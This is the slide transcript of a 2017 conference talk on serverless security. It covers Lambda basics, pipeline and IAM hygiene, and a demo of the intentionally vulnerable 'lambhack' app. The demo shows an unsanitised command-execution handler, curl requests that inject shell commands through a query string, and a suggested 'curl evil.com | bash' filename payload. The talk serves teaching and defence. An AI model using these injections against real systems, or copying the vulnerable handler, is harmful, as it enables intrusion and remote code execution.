serverless security: a pragmatic primer for builders and defenders
TRANSCRIPT
Velocity San Jose 2017 @WICKETT
SERVERLESS SECURITY: A PRAGMATIC PRIMER
FOR BUILDERS AND DEFENDERS
JAMES WICKETT
Velocity San Jose 2017 @WICKETT
‣ DEVOPS DAYS AUSTIN ORGANIZER
‣ HEAD OF RESEARCH AT SIGNAL SCIENCES
‣ AUTHOR DEVOPS FUNDAMENTALS AT LYNDA.COM
‣ BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
Velocity San Jose 2017 @WICKETT
Don’t worry, this is not a thinly veiled vendor pitch.
Velocity San Jose 2017 @WICKETT
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
Velocity San Jose 2017 @WICKETT
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
Velocity San Jose 2017 @WICKETT
WHAT IS SERVERLESS?
Velocity San Jose 2017 @WICKETT
MISCONCEPTIONS
Velocity San Jose 2017 @WICKETT
IT’S MARKETING (CLOUD REBRANDED)
Velocity San Jose 2017 @WICKETT
SERVERLESS == NO SERVERS
Velocity San Jose 2017 @WICKETT
SERVERLESS == BACKEND AS A SERVICE
Velocity San Jose 2017 @WICKETT
SERVERLESS == PLATFORM AS A SERVICE
Velocity San Jose 2017 @WICKETT
TK: ADRIANCO QUOTE
Velocity San Jose 2017 @WICKETT
SO, WHAT IS SERVERLESS?
Velocity San Jose 2017 @WICKETT
http://martinfowler.com/articles/serverless.html
@MIKEBROBERTS
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
‣ 2012 - USED TO DESCRIBE BAAS AND CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES
‣ LATE 2014 - AWS LAUNCHED LAMBDA
‣ JULY 2015 - AWS LAUNCHED API GATEWAY
‣ OCTOBER 2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA
‣ 2015 TO PRESENT - FRAMEWORKS FORMING
‣ 2016 - GOOGLE CLOUD FUNCTIONS, AZURE FUNCTIONS RELEASED
‣ 2016 - SERVERLESS CONFERENCES STARTED
HISTORY OF SERVERLESS
Velocity San Jose 2017 @WICKETT
VMsHardware Serverless
Inspiration from @adrianco
Waste
Value
Velocity San Jose 2017 @WICKETT
Decomposed Microservice Architecture
Velocity San Jose 2017 @WICKETT
WHAT CAN WE SAY IS SERVERLESS?
Velocity San Jose 2017 @WICKETT
SERVERLESS IS FUNCTIONS AS A SERVICE
(FaaS)
Velocity San Jose 2017 @WICKETT
CONTAINERS ON DEMAND
Velocity San Jose 2017 @WICKETT
SERVERLESS IS (NO MANAGEMENT OF)
SERVERS
Velocity San Jose 2017 @WICKETT
SERVERLESS IS SERVICEFULL
Velocity San Jose 2017 @WICKETT
SERVERLESS IS AN OPINIONATED
FRAMEWORK FOR COMPUTE AND
CONTAINERS
Velocity San Jose 2017 @WICKETT
If you want to lead your company bravely into the new
world, you would do well to focus lot on how serverless will
evolve. - @Cloudopinion
https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
Velocity San Jose 2017 @WICKETT
THE CLOUD WAS TO VIRTUALIZATION AS
SERVERLESS WILL BE TO CONTAINERS
Velocity San Jose 2017 @WICKETT
Serverless encourages functions as deploy units, coupled with third party services that allow
running end-to-end applications without worrying about system
operation.
SERVERLESS DEFINITION
Velocity San Jose 2017 @WICKETT
SO, WHAT ARE THE UPSIDES?
Velocity San Jose 2017 @WICKETT
SCALING BUILT IN
Velocity San Jose 2017 @WICKETT
PAY FOR WHAT YOU USE IN 100MS INCREMENTS
Velocity San Jose 2017 @WICKETT
WITH SERVERLESS SYSTEM ADMINISTRATION IS
(MOSTLY) LOWER
Velocity San Jose 2017 @WICKETT
SHORT CIRCUITS OPS AND MOVES INFRASTRUCTURE
RUNTIME CLOSER TO DEVS
Velocity San Jose 2017 @WICKETT
YOU CAN SKIP DOCKERING ALL THE
THINGS!
Velocity San Jose 2017 @WICKETT
GREAT, WHAT’S THE CATCH?
Velocity San Jose 2017 @WICKETT
Ops burden to rationalize serverless model
@patrickdebois
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
VENDOR LOCK-IN
Velocity San Jose 2017 @WICKETT
MONITORING
Velocity San Jose 2017 @WICKETT
LOGGING
Velocity San Jose 2017 @WICKETT
RELIABILITY
Velocity San Jose 2017 @WICKETT
‣ APP NEEDS LARGE LOCAL DISK SPACE
‣ LONG RUNNING JOBS
‣ BIG I/O TASKS
‣ LATENCY SENSITIVE REQUESTS THAT CAN’T WAIT FOR THE COLD-STARTUP TIME
SERVERLESS DEAL KILLERS (PROBABLY)
Velocity San Jose 2017 @WICKETT
SERVERLESS USE CASES
Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html
MESSAGE PROCESSING
Velocity San Jose 2017 @WICKETT http://martinfowler.com/articles/serverless.html
API GATEWAY
Velocity San Jose 2017 @WICKETT
WEB APPLICATIONS
Velocity San Jose 2017 @WICKETT
CI/CD auth
wordpress scraper
event ingestion chatbots
load testing
MORE SERVERLESS USE CASES
Velocity San Jose 2017 @WICKETT
Security
Velocity San Jose 2017 @WICKETT
LETS TRY A SAMPLE APPLICATION IN AWS
Velocity San Jose 2017 @WICKETT
‣ SERVERLESS
‣ APEX
‣ GO SPARTA
‣ KAPPA
STEP 1: PICK A FRAMEWORK
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
‣ GOLANG!
‣ AWS LAMBDA SUPPORTS BRING YOUR OWN BINARY
‣ SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM
‣ GO SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES
GO SPARTA
Velocity San Jose 2017 @WICKETT
‣ CLOUDWATCH EVENTS AND LOGS
‣ DYNAMODB, KINESIS,
‣ S3
‣ SES, SNS
‣ API GATEWAY CREATION
GO SPARTA INCLUDES
Velocity San Jose 2017 @WICKETT
‣ BUILD A WORD CLOUD GENERATOR
‣ ABLE TO CONSUME 3RD PARTY APIS FOR TEXT SOURCES
‣ RETURN JSON WITH COUNTS OF WORDS IN TEXT
‣ KEEP IT SIMPLE
STEP 2: IDEA!
Velocity San Jose 2017 @WICKETT
‣ (USING GO SPARTA FOR THE FRAMEWORK)
‣ LAMBDA
‣ S3
‣ API GATEWAY
STEP 3: DESIGN AND ARCHITECTURE
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
STEP 4: WRITE THE HANDLER
Velocity San Jose 2017 @WICKETT
STEP 5: SETUP API GATEWAY
Velocity San Jose 2017 @WICKETT
STEP 6: SET THE CONFIG DETAILS
Velocity San Jose 2017 @WICKETT
STEP 7: PROVISION YOUR APP!
Velocity San Jose 2017 @WICKETT
STEP 8: SETUP STRICT IAM POLICIES
Velocity San Jose 2017 @WICKETT
STEP 9: GIVE UP AND SET LOOSE IAM POLICIES, PROMISE TO FIX LATER
Velocity San Jose 2017 @WICKETT
STEP 10: PROVISION YOUR APP!
Velocity San Jose 2017 @WICKETT
APP IN AWS CONSOLE
Velocity San Jose 2017 @WICKETT
TEST LAMBDA EXEC IN CONSOLE
FIRST RUN OF 343MS
Velocity San Jose 2017 @WICKETT
SECOND RUN ONLY TOOK 84MS
Velocity San Jose 2017 @WICKETT
API GATEWAY IN CONSOLE
Velocity San Jose 2017 @WICKETT
API GATEWAY EXECUTION IN CONSOLE
Velocity San Jose 2017 @WICKETT
RETURNED JSON
Velocity San Jose 2017 @WICKETT
MONITORING LAMBDA IN CONSOLE
Velocity San Jose 2017 @WICKETT
WHAT I LEARNED ABOUT SERVERLESS SECURITY
Velocity San Jose 2017 @WICKETT
SECURITY
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
‣ SECURE SOFTWARE SUPPLY CHAIN
‣ DELIVERY PIPELINE
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
FOUR AREAS OF SERVERLESS SECURITY
Velocity San Jose 2017 @WICKETT source: @devsecops
Velocity San Jose 2017 @WICKETT
‣ THE CODE YOU WRITE (AND LIBS) IS YOUR SURFACE AREA NOW
‣ CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED) OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO INHERITANCE
SURFACE AREA REDUCTION
Velocity San Jose 2017 @WICKETT
‣ TLS CONTROL TO THE PROVIDER
‣ ROUTING CONTROL TO THE PROVIDER
‣ CONSUMPTION OF THIRD PARTY SERVICES
‣ IAM ROLES AND POLICY CONFUSION
SURFACE AREA EXPANSION
Velocity San Jose 2017 @WICKETT
SSL / TLS FROM THE PROVIDER
Velocity San Jose 2017 @WICKETT
OLD WAY
NEW WAY
Velocity San Jose 2017 @WICKETT
ROUTING FROM THE PROVIDER
Velocity San Jose 2017 @WICKETT
ROUTING THE OLD WAY
Velocity San Jose 2017 @WICKETT
ROUTING THE NEW WAY
Velocity San Jose 2017 @WICKETT
Lambda + s3 + kinesis + DynamoDB +
cloudformation + API Gateway + Auth0
SERVICE AND 3RD PARTY EXPANSION
Velocity San Jose 2017 @WICKETT https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds
IAM ROLES AND POLICIES
Velocity San Jose 2017 @WICKETT
Recommendation: Use a third-party service to monitor for provider
config changes
Velocity San Jose 2017 @WICKETT
‣ DISABLE ROOT ACCESS KEYS
‣ MANAGE USERS WITH PROFILES
‣ SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM
‣ SECURE KEYS IN DEV SYSTEM
‣ USE PROVIDER MFA
USE GOOD HYGIENE WITH YOUR PROVIDER
Velocity San Jose 2017 @WICKETT
DELIVERY PIPELINE SECURITY
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
UNIT TESTING
Velocity San Jose 2017 @WICKETT
EASIER TO MOCK
HARDER TO MOCK
Velocity San Jose 2017 @WICKETT
UNIT TESTING EVEN MORE CRITICAL AS
INTEGRATION TESTING IN DEV IS
HARDER
Velocity San Jose 2017 @WICKETT
‣ USE OF A STAGING OR PRE-PROD ENV
‣ END TO END SYNTHETIC INTEGRATION TESTS
‣ ALL THE USUAL SUSPECTS
INTEGRATION TESTING
Velocity San Jose 2017 @WICKETT
CONFIGURATION IS PART OF DELIVERY
Velocity San Jose 2017 @WICKETT
‣ ONLY DEV KEYS CAN PUSH TO ‘DEV’
‣ ONLY BUILD/DEPLOY SYSTEM CAN PUSH TO PRE-PROD
‣ INTEGRATION TESTS MUST PASS IN THIS ENV
‣ SECURITY VALIDATION MUST TAKE PLACE BEFORE PROMOTION
‣ ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM
GOOD PIPELINE PRACTICES
Velocity San Jose 2017 @WICKETT
‣ BDD-SECURITY - GITHUB.COM/CONTINUUMSECURITY/BDD-SECURITY
‣ GAUNTLT - GAUNTLT.ORG
‣ GITHUB.COM/GAUNTLT/GAUNTLT
‣ DOCKER RECOMMENDED
SECURITY TESTING TOOLS
Velocity San Jose 2017 @WICKETT
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
GAUNTLT WORKSHOP IN 9 EXAMPLES
Velocity San Jose 2017 @WICKETT
DATA FLOW‣ DEVELOPMENT
‣ DATA FLOW DIAGRAMS
‣ THREAT MODELING
‣ RUNTIME
‣ LOGGING
‣ CUSTOM MONITORS/METRICS
Velocity San Jose 2017 @WICKETT
Your provider is responsible for the underlying infrastructure
and services. You are responsible for ensuring you use the services in a secure manner.
https://read.acloud.guru/adopting-serverless-architectures-and-
security-254a0c12b54a
Velocity San Jose 2017 @WICKETT
‣ SPOOFING CONSUMED RESOURCES
‣ DENIAL OF SERVICE
‣ TIMEOUTS
‣ EXECUTION RESTRICTIONS FOR RESOURCES
‣ CAPACITY ISSUES
DATA FLOW SECURITY
Velocity San Jose 2017 @WICKETT
ATTACK DETECTION
Velocity San Jose 2017 @WICKETT
DOES APPLICATION SECURITY STILL MATTER?
Velocity San Jose 2017 @WICKETThttps://medium.com/
@PaulDJohnston/security-and-serverless-ec52817385c4
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
APPSEC GREATEST HITS (XSS, SQLI, CMDEXE) STILL
RELEVANT 15 YEARS LATER!
Velocity San Jose 2017 @WICKETT
‣ SERVERLESS HAS A FALSE SENSE OF SECURITY
‣ API PROXY LAYER THING PROTECTS ME, RIGHT? ;)
‣ WANTED TO SEE MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ BORN FROM THE HERITAGE OF WEBGOAT, RAILS GOAT, GRUYERE, AND OTHERS…
INTRODUCING LAMBHACK
Velocity San Jose 2017 @WICKETT
‣ A VULNERABLE LAMBDA + API GATEWAY STACK
‣ OPEN SOURCE, MIT LICENSED
‣ INCLUDES ARBITRARY CODE EXECUTION IN A QUERY STRING
‣ MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND LOOKING FOR COMMUNITY HELP
‣ GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lamback
Velocity San Jose 2017 @WICKETT
lambhack is a vulnerable serverless lambda application
It would certainly be a bad idea to base any coding patterns off
what you see here.
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
BAD CODE IS BAD CODEEVEN IN SERVERLESS…
command := lambdaEvent.QueryParams[“args"]
output := runner.Run(command)
Velocity San Jose 2017 @WICKETT
With command execution available to us in
lambhack, we can poke around the container a bit
Velocity San Jose 2017 @WICKETT
UNAME -A
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Velocity San Jose 2017 @WICKETT
CAT /PROC/VERSION$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/version;+sleep+1”
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
Velocity San Jose 2017 @WICKETT
LET’S LOOK IN /TMP
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp;+sleep+1"
total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 . drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
Velocity San Jose 2017 @WICKETT
LAMBDA REUSE IN ACTION!
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=ls+/tmp;+sleep+1"
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=touch+/tmp/wickettfile;+sleep+1”
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile
Velocity San Jose 2017 @WICKETT
WHICH CURL
$ curl “https://XXXX.execute-api.us-east-1.amazonaws.com/prod/lambhack/c?args=which+curl;+sleep+1"
> /usr/bin/curl
Velocity San Jose 2017 @WICKETT
‣ ADD XSS
‣ ADD OTHER INJECTION ATTACKS
‣ ADD AUTH VECTORS
‣ …
‣ PULL REQUESTS ACCEPTED :)
FUTURE OF LAMBHACK
Velocity San Jose 2017 @WICKETT
‣ LAMBDA HAS LIMITED BLAST RADIUS, BUT NOT ZERO
‣ MONITORING/LOGGING PLAYS A KEY ROLE HERE
‣ DETECT LONGER RUN TIMES
‣ HIGHER ERROR RATE OCCURRENCES
‣ DATA INGESTION
‣ LOG ACTIONS OF LAMBDAS
APPSEC THOUGHTS
Velocity San Jose 2017 @WICKETT
APPLICATION SECURITY IS STILL RELEVANT
Velocity San Jose 2017 @WICKETT
‣ New surface area, similar appsec problems
‣ Command Exec
‣ XSS
‣ Injection Attacks
‣ Try new things, e.g. appending ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3
TYPES OF ATTACKS
Velocity San Jose 2017 @WICKETT
‣ LOGGING, EMITTING EVENTS
‣ USAGE METRICS
‣ VANDIUM (SQLI) WRAPPER
‣ CONTENT SECURITY POLICY (CSP)
‣ MORE THINGS NEED TO BE DONE HERE…
DEFENSE
Velocity San Jose 2017 @WICKETT
Development in serverless is easier than ever, attracting new developers to web development, as a result, application security
will see a rise.
FINAL THOUGHT
Velocity San Jose 2017 @WICKETT
Velocity San Jose 2017 @WICKETT
‣ SERVERLESS ENCOURAGES FUNCTIONS AS DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
‣ NEW SERVERLESS PATTERNS ARE JUST EMERGING
‣ SECURITY WITH SERVERLESS IS EASIER
‣ SECURITY WITH SERVERLESS IS HARDER
CONCLUSION (1 OF 2)
Velocity San Jose 2017 @WICKETT
‣ FOUR KEY AREAS APPLY TO SERVERLESS SECURITY
‣ SOFTWARE SUPPLY CHAIN SECURITY
‣ DELIVERY PIPELINE SECURITY
‣ DATA FLOW SECURITY
‣ ATTACK DETECTION
‣ LAMBHACK! A VERY VULNERABLE LAMBDA STACK OPEN SOURCE PROJECT
‣ GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
Velocity San Jose 2017 @WICKETT
WANT THE SLIDES RIGHT NOW OR HAVE QUESTIONS?
Send an email to [email protected]